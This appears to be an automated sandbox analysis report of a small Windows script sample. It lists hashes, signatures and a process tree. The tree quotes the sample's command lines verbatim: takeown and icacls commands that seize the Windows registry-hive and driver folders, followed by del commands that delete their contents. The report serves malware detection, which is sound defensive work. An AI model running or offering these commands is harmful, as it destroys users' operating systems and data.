Analysis
- max time kernel: 149s
- max time network: 157s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-08-2024 21:30
- Static task: static1
- Behavioral task: behavioral1
- Sample: script.wsf
- Resource: win7-20240708-en
General
- Target: script.wsf
- Size: 2KB
- MD5: cef6ac1c7b72212cb9b26421ba748362
- SHA1: 05858a591fc90a1af835454aee11b7d893649517
- SHA256: 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
- SHA512: 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process):
    3512 takeown.exe
    3948 takeown.exe
    3188 icacls.exe
    3468 icacls.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
    Key value queried, \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation, cmd.exe
    Key value queried, \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation, WScript.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes (pid, process):
    3188 icacls.exe
    3468 icacls.exe
    3948 takeown.exe
    3512 takeown.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoC)
  Processes (description, ioc, process):
    Key created, \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings, cmd.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process):
    Token: SeTakeOwnershipPrivilege, 3512, takeown.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes (description, pid, process, target process):
    PID 2856 wrote to memory of 5056, cmd.exe -> WScript.exe
    PID 2856 wrote to memory of 5056, cmd.exe -> WScript.exe
    PID 5056 wrote to memory of 3152, WScript.exe -> cmd.exe
    PID 5056 wrote to memory of 3152, WScript.exe -> cmd.exe
    PID 5056 wrote to memory of 4652, WScript.exe -> cmd.exe
    PID 5056 wrote to memory of 4652, WScript.exe -> cmd.exe
    PID 3152 wrote to memory of 3948, cmd.exe -> takeown.exe
    PID 3152 wrote to memory of 3948, cmd.exe -> takeown.exe
    PID 4652 wrote to memory of 3512, cmd.exe -> takeown.exe
    PID 4652 wrote to memory of 3512, cmd.exe -> takeown.exe
    PID 3152 wrote to memory of 3188, cmd.exe -> icacls.exe
    PID 3152 wrote to memory of 3188, cmd.exe -> icacls.exe
    PID 4652 wrote to memory of 3468, cmd.exe -> icacls.exe
    PID 4652 wrote to memory of 3468, cmd.exe -> icacls.exe
Processes (tree; indentation shows parent/child)
- C:\Windows\system32\cmd.exe (PID 2856)
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"
  Signatures:
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe (PID 5056)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
    Signatures:
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (PID 3152)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      Signatures:
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (PID 3948)
        Command line: takeown /f c:\windows\system32\config\*
        Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
      - C:\Windows\system32\icacls.exe (PID 3188)
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
    - C:\Windows\System32\cmd.exe (PID 4652)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      Signatures:
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (PID 3512)
        Command line: takeown /f c:\windows\system32\drivers\*
        Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe (PID 3468)
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
- MD5: cef6ac1c7b72212cb9b26421ba748362
- SHA1: 05858a591fc90a1af835454aee11b7d893649517
- SHA256: 92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
- SHA512: 435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c